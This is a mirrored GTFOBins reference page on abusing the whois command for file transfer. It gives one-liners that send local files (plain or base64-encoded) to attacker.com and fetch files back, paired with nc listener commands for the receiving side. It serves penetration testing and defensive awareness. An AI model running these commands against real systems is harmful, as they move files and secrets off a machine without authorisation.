GTFOBins.github.io/whois.md at d6895f367d8440f95d3cdd4624becf341684049f - GTFOBins.github.io - git.dotya.ml

mirror/GTFOBins.github.io

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Emilio Pinna d6895f367d Reorder functions in binaries

2018-07-04 19:26:52 +01:00

1.4 KiB

Raw Blame History

description

functions

`whois` hangs waiting for the remote peer to close the socket.

upload

download

description	code
Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.	RHOST=attacker.com RPORT=12345 LFILE=file_to_send whois -h $RHOST -p $RPORT "`cat $LFILE`"

description	code
Send a binary file to a TCP port. Run `nc -l -p 12345 \| tr -d $'\x0d' \| base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.	RHOST=attacker.com RPORT=12345 LFILE=file_to_send whois -h $RHOST -p $RPORT "`base64 $LFILE`"

description	code
Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.	RHOST=attacker.com RPORT=12345 LFILE=file_to_save whois -h $RHOST -p $RPORT > "$LFILE"

description	code
Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" \| nc -l -p 12345` on the attacker box to send the file.	RHOST=attacker.com RPORT=12345 LFILE=file_to_save whois -h $RHOST -p $RPORT \| base64 -d > "$LFILE"